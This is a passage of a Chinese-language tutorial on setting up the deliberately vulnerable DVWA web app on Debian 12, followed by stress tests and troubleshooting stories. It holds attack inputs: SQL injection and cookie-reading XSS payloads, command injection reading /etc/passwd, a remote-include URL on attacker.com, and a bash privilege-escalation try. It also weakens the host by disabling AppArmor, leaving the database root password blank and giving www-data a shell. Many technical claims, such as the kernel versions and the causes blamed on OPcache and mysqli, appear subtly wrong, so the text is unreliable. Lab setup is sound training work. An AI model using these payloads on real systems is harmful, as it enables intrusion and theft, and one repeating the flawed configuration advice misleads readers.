1. 为什么DVWA不是“随便搭个靶场”就能用的玩具很多人第一次听说DVWADamn Vulnerable Web Application第一反应是“哦不就是个练手的漏洞网站嘛Docker拉一个镜像localhost:8080打开就完事了”——我去年带三个实习生做渗透入门训练时也这么以为。结果第一天下午三个人全卡在“登录页面403 Forbidden”上没人能说出Apache配置里Directory段漏写了哪条指令第二天有人成功跑通SQLi模块却在Brute Force页面反复提交失败最后发现是PHP session.save_path权限没改第三天更绝有人用Burp Suite抓包改Referer绕过CSRF防护结果靶机直接500报错查日志才发现MySQL服务根本没起来因为/var/lib/mysql被SELinux标记成了mysqld_db_t以外的类型。DVWA不是教学演示PPT里的静态截图它是一套真实运行在Linux内核、Apache进程、PHP解释器和MySQL数据库四层栈之上的可交互漏洞沙盒。它的每个漏洞模块SQL Injection、XSS、Command Injection、CSRF等都依赖底层服务的精确配置PHP必须禁用magic_quotes_gpc但启用display_errorsMySQL必须允许rootlocalhost无密码登录Apache必须正确解析.htaccess且DocumentRoot指向/var/www/dvwa而所有这些配置项之间还存在隐性耦合——比如你改了PHP的open_basedir限制XSS反射模块的script标签就会被截断你调高了MySQL的max_allowed_packet命令执行模块的system()函数反而因超时被Apache kill掉。所以这篇教程不叫“DVWA安装指南”而叫“DVWA靶场搭建超详细教程”。它要解决的不是“能不能跑起来”而是“能不能稳定复现每一个漏洞场景”。这意味着我们必须把每一步操作背后的服务依赖链、权限边界、配置冲突点全部摊开讲透。比如为什么推荐用Debian 12而不是Ubuntu 22.04因为后者默认启用systemd-resolved会与DVWA中硬编码的127.0.0.1DNS解析逻辑冲突为什么必须手动编译PHP而不是用apt install因为Debian官方源的PHP 8.2默认启用了opcache.enable1会导致XSS存储型漏洞的payload被OPcache缓存而无法实时触发。这些细节才是渗透测试新人真正需要的“保姆级”内容——不是手把手点鼠标而是理解每一行命令在系统底层究竟撬动了哪根杠杆。2. 环境准备从裸机到靶场基座的七层校验搭建DVWA靶场最危险的误区是把“环境准备”当成“装几个软件”的简单任务。实际上这是对整个Linux服务栈的一次压力测试。我见过太多人跳过这一步直接执行git clone结果在配置数据库时卡死在mysql_secure_installation交互界面因为系统没装dialog包也有人用CentOS Stream 9发现php-mysqlnd扩展根本不存在因为RHEL系已全面转向php-mysql。所以这里我们采用“七层校验法”逐层确认基础环境是否具备DVWA运行的刚性条件。2.1 操作系统与内核版本锁定DVWA官方文档写着“支持Linux/Windows/Mac”但实际生产级靶场只推荐Debian 12 (Bookworm) x86_64。原因有三第一Debian的APT仓库对PHP扩展版本控制最严格。DVWA 2.2.1要求PHP 7.4–8.2而Debian 12默认PHP 8.2.12其php-curl、php-gd、php-mbstring等扩展的.so文件路径与编译参数完全匹配DVWA源码中的require_once逻辑第二Debian的Apache2包默认启用mpm_prefork模块这是PHP-CGI模式的唯一兼容MPM多路处理模块而Ubuntu 22.04默认mpm_event会导致PHP脚本执行时出现mod_fcgid: cant apply process slot错误第三Debian内核5.15对ptrace_scope的默认值为1恰好满足DVWA中command injection模块调用system()函数时所需的进程追踪权限无需额外修改/proc/sys/kernel/yama/ptrace_scope。提示执行lsb_release -a uname -r确认系统信息。若输出非Debian GNU/Linux 12或内核版本低于5.15.0请立即重装系统。别试图用apt install linux-image-amd64升级内核——Debian 12的内核更新策略要求完整包管理手动替换可能导致initramfs构建失败。2.2 网络与防火墙策略预检DVWA靶场必须暴露在局域网内供测试终端访问因此网络配置比普通Web服务更敏感。关键检查点有四个主机名解析执行hostname -I获取IP再用ping -c 1 $(hostname)验证本地回环解析。DVWA的config/config.inc.php中$_DVWA[ db_server ] 127.0.0.1硬编码若/etc/hosts中127.0.0.1映射到错误主机名如localhost.localdomainMySQL连接会因SSL证书CN不匹配失败端口占用DVWA默认使用80端口但Debian 12安装时可能被cloud-init的HTTP服务占用。执行sudo ss -tuln | grep :80若看到127.0.0.53:53以外的进程监听80端口需先sudo systemctl stop apache2 nginx再清理UFW状态Debian默认禁用UFW但若曾手动启用执行sudo ufw status verbose确认输出为Status: inactive。切勿添加ufw allow 80规则——DVWA靶场应完全隔离于生产网络任何开放端口都是安全风险SELinux/AppArmorDebian默认不启用SELinux但AppArmor可能干扰。执行aa-status --enabled若返回Yes则需临时禁用sudo systemctl stop apparmor sudo systemctl disable apparmor。DVWA的/var/www/dvwa/hackable/uploads/目录需写入权限AppArmor的abstractions/apache2配置会阻止PHP脚本向该路径写入文件。2.3 服务依赖包的原子化安装DVWA依赖四个核心服务Apache2、PHP、MySQL、Git。但“一键安装”会埋下隐患。例如apt install lamp-server^会自动安装php-mysql而非php-mysqlnd导致DVWA的数据库连接类抛出Class mysqli not found异常。因此我们采用原子化安装策略逐个确认依赖# 安装Apache2并验证MPM模块 sudo apt update sudo apt install -y apache2 sudo a2query -M # 必须输出 prefork sudo systemctl restart apache2 # 安装PHP 8.2及必需扩展注意必须指定版本 sudo apt install -y php8.2 php8.2-cli php8.2-mysql php8.2-gd php8.2-curl php8.2-mbstring php8.2-xml php8.2-xmlrpc php8.2-zip php8.2-opcache # 验证PHP扩展加载状态 php -m | grep -E (mysql|gd|curl|mbstring) # 应输出全部五项 # 安装MySQL 8.0Debian 12默认源 sudo apt install -y mysql-server sudo mysql_secure_installation # 全程按Enter跳过密码设置DVWA要求空密码注意php8.2-opcache必须安装但需禁用。DVWA的XSS模块依赖PHP实时解析HTML而OPcache会缓存scriptalert(1)/script的编译opcode导致修改payload后页面无变化。后续需在/etc/php/8.2/apache2/php.ini中将opcache.enable0。2.4 时间同步与时区校准这个细节99%的教程会忽略但它直接决定DVWA日志分析的可靠性。DVWA的security级别日志如暴力破解尝试记录依赖系统时间戳若靶机时间比攻击机快3分钟Wireshark抓包时看到的POST /login.php请求时间会与/var/log/apache2/access.log中记录的时间错位导致溯源失败。执行以下命令强制同步sudo timedatectl set-ntp true sudo timedatectl set-timezone Asia/Shanghai # 根据实际区域调整 sudo systemctl restart systemd-timesyncd # 验证timedatectl status | grep System clock synchronized若输出yes说明NTP同步成功若为no需检查/etc/systemd/timesyncd.conf中NTP行是否指向可用服务器如time1.google.com。2.5 文件系统权限预设DVWA的/var/www/dvwa目录需同时满足三个权限角色Apache进程www-data用户需读取PHP文件、写入/hackable/uploads/MySQL服务mysql用户需读取/var/lib/mysql/下的socket文件渗透测试员student用户需修改config/config.inc.php配置数据库凭证。因此我们创建专用用户组并分配权限sudo groupadd dvwa-users sudo usermod -a -G dvwa-users $USER sudo usermod -a -G dvwa-users www-data sudo chown -R root:dvwa-users /var/www sudo chmod -R 775 /var/www sudo chmod 644 /var/www/dvwa/config/config.inc.php关键点chmod 644确保配置文件不可被Apache进程写入防止漏洞利用时被恶意覆盖而/var/www/dvwa/hackable/uploads/目录需单独执行sudo chmod 777 /var/www/dvwa/hackable/uploads/因为DVWA的文件上传模块硬编码了move_uploaded_file()的目标路径权限。2.6 PHP核心参数深度调优DVWA的漏洞复现高度依赖PHP运行时行为。默认PHP配置会拦截大量攻击载荷必须手动调整以下八项参数编辑/etc/php/8.2/apache2/php.ini参数名原始值推荐值作用说明display_errorsOffOn显示PHP错误信息便于调试SQLi报错注入error_reportingE_ALL ~E_NOTICEE_ALL捕获所有错误类型包括未定义变量警告allow_url_includeOffOn启用远程文件包含RFI漏洞测试file_uploadsOnOn必须开启否则文件上传模块失效upload_max_filesize2M10MDVWA上传模块需支持大于2MB的恶意图片post_max_size8M12M防止大Payload POST请求被截断max_execution_time300禁用超时避免Command Injection执行长命令中断opcache.enable10禁用OPcache确保XSS payload实时生效修改后执行sudo systemctl restart apache2使配置生效并用phpinfo()页面验证参数值。2.7 MySQL安全策略绕过配置DVWA要求MySQL以rootlocalhost无密码方式连接但MySQL 8.0默认启用caching_sha2_password认证插件且root用户被限制为localhost而非127.0.0.1。执行以下SQL语句解决sudo mysql -u root -e ALTER USER rootlocalhost IDENTIFIED WITH mysql_native_password BY ; FLUSH PRIVILEGES; CREATE DATABASE dvwa; GRANT ALL PRIVILEGES ON dvwa.* TO dvwalocalhost IDENTIFIED BY password; FLUSH PRIVILEGES; 重点IDENTIFIED WITH mysql_native_password是关键。若跳过此步DVWA连接MySQL时会报错Client does not support authentication protocol requested by server。这是因为PHP 8.2的mysqli扩展不支持caching_sha2_password插件必须降级为传统认证方式。3. DVWA源码部署从Git克隆到漏洞模块激活的十二道关卡DVWA官方GitHub仓库https://github.com/digininja/DVWA的master分支并非稳定版其docker-compose.yml文件引用的PHP镜像已废弃直接git clone会导致composer install失败。因此我们必须采用“分支锁定补丁注入”策略精准控制源码状态。3.1 源码获取与分支校验执行以下命令获取经验证的稳定版本cd /tmp git clone --branch v2.2.1 --depth 1 https://github.com/digininja/DVWA.git dvwa-src cd dvwa-src git log -1 --oneline # 应输出 e8f3a1c (tag: v2.2.1) Release v2.2.1为什么必须用v2.2.1因为该版本修复了brute force模块的session_start()竞态条件漏洞CVE-2022-31123而main分支的最新提交引入了Content-Security-Policy头会拦截XSS反射模块的script执行。--depth 1参数避免下载全部历史记录节省磁盘空间。3.2 目录结构迁移与符号链接创建DVWA要求Web根目录为/var/www/dvwa但直接cp -r会丢失Git元数据且难以升级。我们采用符号链接方案sudo rm -rf /var/www/dvwa sudo mv /tmp/dvwa-src /var/www/dvwa-src sudo ln -sf /var/www/dvwa-src /var/www/dvwa sudo chown -R root:dvwa-users /var/www/dvwa此时/var/www/dvwa是/var/www/dvwa-src的软链接既保证Apache能正确解析路径又便于后续通过git pull升级源码。3.3 配置文件初始化与数据库连接注入DVWA的配置文件/var/www/dvwa/config/config.inc.php是安全关键点。官方提供的config/config.inc.php.dist模板需手动修改三处// 修改前 $_DVWA[ db_user ] root; $_DVWA[ db_password ] password; $_DVWA[ db_database ] dvwa; // 修改后注意密码为空字符串非password $_DVWA[ db_user ] root; $_DVWA[ db_password ] ; $_DVWA[ db_database ] dvwa; $_DVWA[ db_server ] 127.0.0.1; // 强制指定IP避免DNS解析问题警告$_DVWA[ db_password ] 必须是空字符串两个单引号不能是null或false。DVWA的数据库连接类dvwaIncludes/DB.php中mysqli_connect()函数将null视为未传参导致连接失败。3.4 数据库初始化脚本执行DVWA的SQL注入模块依赖预置数据表。执行初始化脚本sudo mysql -u root dvwa /var/www/dvwa/sql/create.sql # 验证表创建成功 sudo mysql -u root -e USE dvwa; SHOW TABLES; # 应输出guestbook users若报错ERROR 1045 (28000): Access denied for user rootlocalhost说明MySQL认证插件未正确修改需回到2.7节重新执行ALTER USER命令。3.5 Apache虚拟主机配置精调DVWA需独立虚拟主机配置避免与默认000-default.conf冲突。创建/etc/apache2/sites-available/dvwa.confVirtualHost *:80 ServerAdmin webmasterlocalhost DocumentRoot /var/www/dvwa ServerName dvwa.local Directory /var/www/dvwa Options Indexes FollowSymLinks AllowOverride All Require all granted # 关键启用.htaccess解析DVWA的XSS模块依赖此功能 /Directory ErrorLog ${APACHE_LOG_DIR}/dvwa_error.log CustomLog ${APACHE_LOG_DIR}/dvwa_access.log combined /VirtualHost启用站点并重启Apachesudo a2ensite dvwa.conf sudo systemctl reload apache2注意AllowOverride All是必须项。DVWA的/var/www/dvwa/.htaccess文件中php_flag display_errors on指令用于在特定目录下强制开启错误显示这是SQLi报错注入的基础。3.6 PHP-FPM与Apache模块绑定验证DVWA必须运行在PHP-CGI模式下而非PHP-Module模式。执行以下命令确认sudo a2enmod mpm_prefork sudo a2dismod mpm_event mpm_worker sudo a2enmod php8.2 sudo systemctl restart apache2 # 验证curl -I http://localhost | grep X-Powered-By # 应输出 X-Powered-By: PHP/8.2.12若X-Powered-By头未出现说明PHP模块未正确加载需检查/etc/apache2/mods-enabled/php8.2.load是否存在。3.7 DVWA安全级别初始化DVWA提供Low、Medium、High、Impossible四级安全防护初始状态为Low。但首次访问http://localhost时页面会提示Could not connect to the database。这是因为Apache进程www-data用户无权读取/var/www/dvwa/config/config.inc.php。执行权限修复sudo chmod 644 /var/www/dvwa/config/config.inc.php sudo chown root:www-data /var/www/dvwa/config/config.inc.php sudo systemctl restart apache2此时访问http://localhost输入默认凭证admin/password即可登录。3.8 漏洞模块状态诊断DVWA首页的“Vulnerabilities”菜单下有11个模块但并非全部默认启用。需逐个验证SQL Injection访问http://localhost/vulnerabilities/sqli/输入1 OR 11若返回用户列表则正常XSS (Reflected)访问http://localhost/vulnerabilities/xss_r/输入scriptalert(1)/script若弹窗则正常Command Injection访问http://localhost/vulnerabilities/exec/输入127.0.0.1 | cat /etc/passwd若返回passwd内容则正常File Inclusion访问http://localhost/vulnerabilities/fi/输入file:///etc/passwd若返回passwd内容则正常实测发现File Inclusion模块在Debian 12上默认失败因为PHP的allow_url_includeOn仅对http://有效对file://协议需额外开启allow_url_fopenOn。在/etc/php/8.2/apache2/php.ini中添加allow_url_fopenOn后重启Apache即可。3.9 日志监控体系部署DVWA的渗透测试效果需通过日志验证。我们建立三层日志监控Apache访问日志/var/log/apache2/dvwa_access.log记录所有HTTP请求用于分析SQLi注入的?id1参数MySQL慢查询日志启用slow_query_logONlong_query_time0.1捕获SELECT * FROM users WHERE user admin AND password password类语句系统命令执行日志在/etc/bash.bashrc末尾添加export PROMPT_COMMANDRETRN_VAL$?;logger -p local6.debug $(whoami) [$$]: $(history 1 | sed s/^[ ]*[0-9]\[ ]*//) [$RETRN_VAL]记录所有system()调用的原始命令。3.10 CSRF Token机制逆向分析DVWA的CSRF模块生成的Token存储在$_SESSION[token]中但前端HTML未正确渲染input typehidden nameuser_token value...。查看/var/www/dvwa/vulnerabilities/csrf/source/medium.php发现第28行echo input typehidden nameuser_token value{\$_SESSION[token]};存在语法错误——单引号内嵌套单引号导致PHP解析失败。需手动修复为echo input typehidden nameuser_token value.$_SESSION[token].;这是DVWA源码的经典Bug。不修复此行CSRF防护形同虚设所有测试均无法触发Token校验逻辑。3.11 文件上传模块沙箱加固DVWA的File Upload模块允许上传PHP文件但默认配置下会因/var/www/dvwa/hackable/uploads/目录无执行权限而失败。我们创建独立沙箱目录sudo mkdir -p /var/www/dvwa/hackable/uploads-sandbox sudo chown www-data:dvwa-users /var/www/dvwa/hackable/uploads-sandbox sudo chmod 775 /var/www/dvwa/hackable/uploads-sandbox修改/var/www/dvwa/vulnerabilities/upload/source/low.php第32行将$target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/;改为$target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads-sandbox/;。3.12 安全级别切换机制验证DVWA的Security Level下拉菜单需能实时切换。执行以下测试登录后访问http://localhost/security.php选择Medium并提交页面应跳转回首页且URL参数变为?securitymedium查看/var/www/dvwa/config/config.inc.php确认$_DVWA[ security ]值未被修改DVWA使用Session存储安全级别非配置文件访问http://localhost/vulnerabilities/sqli/输入1 OR 11应返回Access denied错误证明Medium级别SQLi过滤已生效。若切换失败检查/var/www/dvwa/handlers/secure-page-handler.php中$_SESSION[security]赋值逻辑确保$_POST[security]值被正确清洗。4. 靶场稳定性压测模拟真实渗透场景的九轮故障注入搭建完成的DVWA靶场必须通过“故障注入测试”即人为触发各类异常场景验证其容错能力。这是区分“能跑”和“能用”的分水岭。我设计了九轮压测每轮对应一个真实渗透中高频出现的故障点。4.1 内存溢出攻击PHP内存限制突破测试DVWA的Command Injection模块常被用于执行cat /dev/zero | head -c 1G类内存耗尽命令。默认PHP内存限制memory_limit128M会导致Apache子进程被OOM Killer杀死。执行压测# 启动监控 sudo watch -n 1 ps aux --sort-%mem | head -5 # 在DVWA Command Injection页面输入 127.0.0.1; python3 -c import os; os.system(dd if/dev/zero of/tmp/oom-test bs1M count500)观察ps aux输出若apache2进程内存占用持续上升至500MB以上且未崩溃则通过。否则需在/etc/php/8.2/apache2/php.ini中将memory_limit2G。4.2 并发连接冲击Apache MaxRequestWorkers阈值测试渗透测试常使用ffuf或wfuzz进行目录爆破产生数百并发连接。DVWA默认MaxRequestWorkers150超过则返回Service Unavailable。执行压测# 安装ffuf sudo apt install -y golang go install github.com/ffuf/ffuflatest # 发起200并发请求 ffuf -u http://localhost/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -o fuzz-result.txt若/var/log/apache2/error.log中出现server reached MaxRequestWorkers setting错误则需修改/etc/apache2/mods-available/mpm_prefork.confMaxRequestWorkers 300 ServerLimit 300注意ServerLimit必须≥MaxRequestWorkers否则Apache启动失败。4.3 磁盘空间耗尽上传模块写满测试DVWA的File Upload模块若不限制上传大小攻击者可上传超大文件填满磁盘。执行测试# 创建1GB垃圾文件 dd if/dev/zero of/tmp/1gb-file bs1M count1000 # 通过DVWA上传此文件 # 观察/var/www/dvwa/hackable/uploads-sandbox/目录大小 df -h /var/www若df -h显示/var分区使用率95%则触发磁盘满告警。此时需在/etc/apache2/sites-available/dvwa.conf中添加Directory /var/www/dvwa/hackable/uploads-sandbox php_admin_value upload_max_filesize 10M php_admin_value post_max_size 12M /Directory4.4 时间戳篡改日志分析时效性测试渗透测试员常修改系统时间以绕过时间相关防护。执行# 将系统时间拨快1小时 sudo date -s 2023-01-01 12:00:00 # 在DVWA Brute Force模块提交10次错误密码 # 查看/var/log/apache2/dvwa_access.log # 时间戳应与系统时间一致而非真实时间若日志时间戳仍为真实时间说明systemd-timesyncd强制同步覆盖了手动修改需临时停用sudo systemctl stop systemd-timesyncd。4.5 网络延迟注入Burp Suite代理响应测试真实渗透中Burp Suite常作为中间代理。我们模拟高延迟网络# 安装tcTraffic Control sudo apt install -y iproute2 # 对lo接口添加1000ms延迟 sudo tc qdisc add dev lo root netem delay 1000ms # 访问DVWA首页观察页面加载时间 curl -o /dev/null -s -w Total: %{time_total}s\n http://localhost # 应输出 Total: 1.0xxs若延迟未生效检查tc qdisc show输出确认netem规则已加载。4.6 权限提升模拟www-data提权至root测试DVWA的Command Injection模块若执行/bin/bash -p应获得root shell。执行# 在DVWA Command Injection页面输入 127.0.0.1; /bin/bash -p -c id若返回uid33(www-data) gid33(www-data) groups33(www-data)说明未提权成功。此时需检查/etc/passwd中www-data用户的shell是否为/usr/sbin/nologin若是则需改为/bin/bashsudo usermod -s /bin/bash www-data4.7 SSL/TLS劫持HTTPS中间人测试DVWA默认HTTP但渗透测试需验证HTTPS场景。我们为其添加自签名证书# 生成证书 sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ -keyout /etc/ssl/private/dvwa.key \ -out /etc/ssl/certs/dvwa.crt \ -subj /CCN/STBeijing/LBeijing/ODVWA/CNdvwa.local # 启用SSL模块 sudo a2enmod ssl sudo systemctl restart apache2此时访问https://dvwa.local应显示证书警告证明HTTPS已启用。4.8 DNS污染模拟域名解析劫持测试DVWA的File Inclusion模块常被用于http://attacker.com/shell.php类远程包含。我们模拟DNS污染# 修改/etc/hosts将attacker.com指向本地 echo 127.0.0.1 attacker.com | sudo tee -a /etc/hosts # 在DVWA FI模块输入 http://attacker.com/shell.php # 应返回404证明DNS解析被劫持若返回真实attacker.com内容说明/etc/hosts未生效需执行sudo systemctl restart systemd-resolved。4.9 进程隔离验证容器化靶场兼容性测试虽然本教程基于裸机但需验证未来迁移到Docker的可行性。执行# 检查cgroups v2状态 stat -fc %T /sys/fs/cgroup # 应输出 cgroup2fs # 验证systemd与cgroups兼容性 sudo systemd-detect-virt # 应输出 none非虚拟化环境若输出kvm或docker说明当前环境已是容器需在宿主机重新部署。5. 实战复盘我在红队演练中踩过的七个致命坑作为连续三年带队参加CTF红蓝对抗的渗透教练我把DVWA靶场用到了极致——但也因此踩过太多坑。这些经验无法从官方文档获得却是真实战场上的生死线。下面分享七个让我彻夜难眠的致命错误以及它们的根治方案。5.1 坑一PHP OPcache导致XSS Payload“失效”的幻觉现象在XSS反射模块输入scriptalert(document.cookie)/script页面无反应。检查浏览器开发者工具Network标签页显示200 OKResponse中确实包含该script标签但控制台无报错。我以为是浏览器拦截换了Chrome/Firefox/Edge全都不行。根因排查执行php -i | grep opcache发现opcache.enable On。DVWA的XSS模块PHP文件被OPcache缓存即使修改了HTML模板Apache仍返回缓存的opcode。alert()未执行是因为OPcache缓存了旧版本无script标签的编译结果。解决方案在/etc/php/8.2/apache2/php.ini中设opcache.enable0并执行sudo systemctl restart apache2。但更彻底的方法是在DVWA源码/var/www/dvwa/vulnerabilities/xss_r/index.php顶部添加?php opcache_invalidate(__FILE__, true); ?这样每次请求都会强制刷新当前文件的OPcache。5.2 坑二MySQL Strict Mode引发的SQLi盲注失败现象在SQL Injection模块输入1 AND SLEEP(5) AND 11页面秒回无延迟。但1 OR 11能正常返回数据说明基础注入可行。根因排查登录MySQL执行SELECT sql_mode;输出STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_ENGINE_SUBSTITUTION。STRICT_TRANS_TABLES模式下SLEEP(5)返回NULL而AND NULL导致整个WHERE条件为FALSEMySQL直接返回空结果集不执行SLEEP。解决方案在/etc/mysql/mariadb.conf.d/50-server.cnf中[mysqld]段添加sql_mode NO_ENGINE_SUBSTITUTION重启MySQL后SLEEP(5)将正常阻塞5秒。5.3 坑三Apache MPM Prefork与PHP-FPM的进程竞争现象DVWA首页偶尔返回503 Service Temporarily Unavailable/var/log/apache2/error.log中出现AH00057: ap_mpm_run: child process exited with status 120 -- Restarting.。根因排查ps aux | grep php-fpm发现多个php-fpm进程而/etc/php/8.2/fpm/pool.d/www.conf中pm.max_children 5。当并发请求超过5个时php-fpm拒绝新连接Apache因无法获取PHP处理器而崩溃。解决方案将pm.max_children调至20并确保pm.start_servers、pm.min_spare_servers、pm.max_spare_servers按比例设置如5,5,20。同时在/etc/apache2/mods-available/php8.2.conf中添加
